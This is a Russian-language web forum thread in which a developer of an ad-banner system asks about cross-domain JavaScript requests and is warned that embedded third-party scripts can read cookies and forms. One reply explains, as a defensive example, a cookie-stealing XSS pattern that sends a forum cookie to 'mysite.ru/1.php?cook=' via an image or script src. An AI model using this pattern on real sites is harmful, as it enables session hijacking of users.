powered by simpleCommunicator - 2.0.61     © 2026 Programmizd 02
Целевая тема:
Создать новую тему:
Автор:
Закрыть
Цитировать
Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Кроссдоменные запросы в javascript
17 сообщений из 17, страница 1 из 1
Кроссдоменные запросы в javascript
    #36639894
Nechto
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
Всем привет.

Пишу баннерную систему. Возник вопрос по кроссдоменным запросам.
Как провильно это реализовать?

Заранее спасибо
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36639951
Фотография Яростный Меч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
jsonp
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36639983
Nechto
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
jsopn Я расматривал, так и не понял как он работает. Можно какой нибуть пример расмотреть более подробный. Если можно ссылку или скрипт.
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36640077
Фотография Яростный Меч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
/topic/711302&hl=jsonp#7925001
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36640147
Nechto
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
Спасибо. буду юзать
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36640741
ShSerge
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
А зачем для баннерной системы такая фича? Кукисы, что-ли тырить?
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36640996
Nechto
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
Кукисы? вы имели введу Cookies. Такая система мне нужно, для того чтобы моя баннерная система не влияла на время загрузки страницы пользователя.

Хочу сделать типа такую вещь

ссылка выполнела запрос на получение js скрипта -> а полученый скрипт средствами Ajax совершил запрос на сервер к php файлу -> после результатом запроса сгенерируется баннер который разместица на странице пользователя.

Почему хочу сделать всё через Ajax? 1)Чтобы не беспокоили боты 2) Баннер подгружался в последнию очередь
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36641051
ShSerge
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Nechto,

Наличие аякса в данном случае - сомнительная необходимость, потому что нет никакой проблемы загрузить картинку без перезагрузки страницы (впрочем и яваскрипт тоже). Достаточно изменить урл в её свойстве срц. А вот доступ из-под баннера к чужой странице - зло ещё то. Например, если бы такой баннер был бы размещён на этой странице, я смог бы без проблем подлогинится под любым пользователем, сюда заглянувшим. :(
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36641091
ShSerge
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Ну, может, я не понял чего. Может, понял с точностью до наоборот. Страница с баннерами Ваша или страница - чужая, а баннеры Ваши? Чё-то не понимаю я такого слова "баннерная система".
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36643731
Nechto
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
авторНапример, если бы такой баннер был бы размещён на этой странице, я смог бы без проблем подлогинится под любым пользователем, сюда заглянувшим Это мне нравится :)

авторБаннерная система это мой рекламная система. Принцип её работы такой же как реклама яндек гугл.
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36643735
Nechto
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
Если такие дела с Аджакс, то действительно его лучше не использовать.

Получается если пользователь размещает на своей странице мой скрипт. То я имею доступ к:

кукам, к его javascriptam, html формам.

Я правильно понял
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36643994
Фотография Яростный Меч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
NechtoПолучается если пользователь размещает на своей странице мой скрипт. То я имею доступ к:

кукам, к его javascriptam, html формам.

Я правильно понялПравильно.
Например, на этом форуме у залогиненого юзера с опцией "запомнить" есть кукис af_remember. Тогда в своем скрипте вы можете создать элемент img или script, в src поместить что-то вроде "http://mysite.ru/1.php?cook="+cookievalue, а на своем сайте mysite.ru в 1.php принять и сохранить значение кукиса.
Это простейший пример XSS-атаки.
Потому не допускайте на свой сайт всякие посторонние скрипты непонятно от кого, если у вас есть система авторизации и всё такое.

ps: если вы создадите страничку, в которой в iframe загружается sql.ru, вы не будете иметь доступ к документу sql.ru из кода js на вашей страничке, т.к. разные домены. Потому такой простой вариант не прокатывает. )
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36644247
Nechto
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
Очень полезная статья оказалась. Очень много для себя узнал.

Раз я пишу баннерную рекламу, то мне это очень пригодится. На этом надо будет сделать сделать акцент, при описании работы системы.

Спасибо всем!!!
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36644606
ShSerge
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Яростный МечПотому не допускайте на свой сайт всякие посторонние скрипты непонятно от кого, если у вас есть система авторизации и всё такое.
Только плагины от Ярмеча можно.
Кстати, проверил от конякулы, вроде ничего такого не нашёл. Всё равно запускать стрёмно. Мало-ли просмотрел какой-нибудь креате.элемент+аппендЧилд.
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36644645
Фотография Яростный Меч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
ShSergeКстати, проверил от конякулы, вроде ничего такого не нашёл. Всё равно запускать стрёмно. Мало-ли просмотрел какой-нибудь креате.элемент+аппендЧилд.По сути, Конякула просто пояснил, как плагин Макса Про настроить в Опере.
Так что все вопросы к Max Pro.
В моем ничего такого нет, можешь проверить, код небольшой и ничего постороннего не подгружает :)
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36644650
Фотография Яростный Меч
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Яростный МечВ моем ничего такого нет, можешь проверить, код небольшой и ничего постороннего не подгружает :)Да, поскольку он приложен как файл к посту, я не могу его незаметно поменять. :)
...
Рейтинг: 0 / 0
Кроссдоменные запросы в javascript
    #36644709
ShSerge
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Яростный Меч,

Это я к тому, что с такими штуками аккуратно нужно.
...
Рейтинг: 0 / 0
17 сообщений из 17, страница 1 из 1
Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Кроссдоменные запросы в javascript
Найденые пользователи ...
Разблокировать пользователей ...
Читали форум (0):
Пользователи онлайн (0):
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]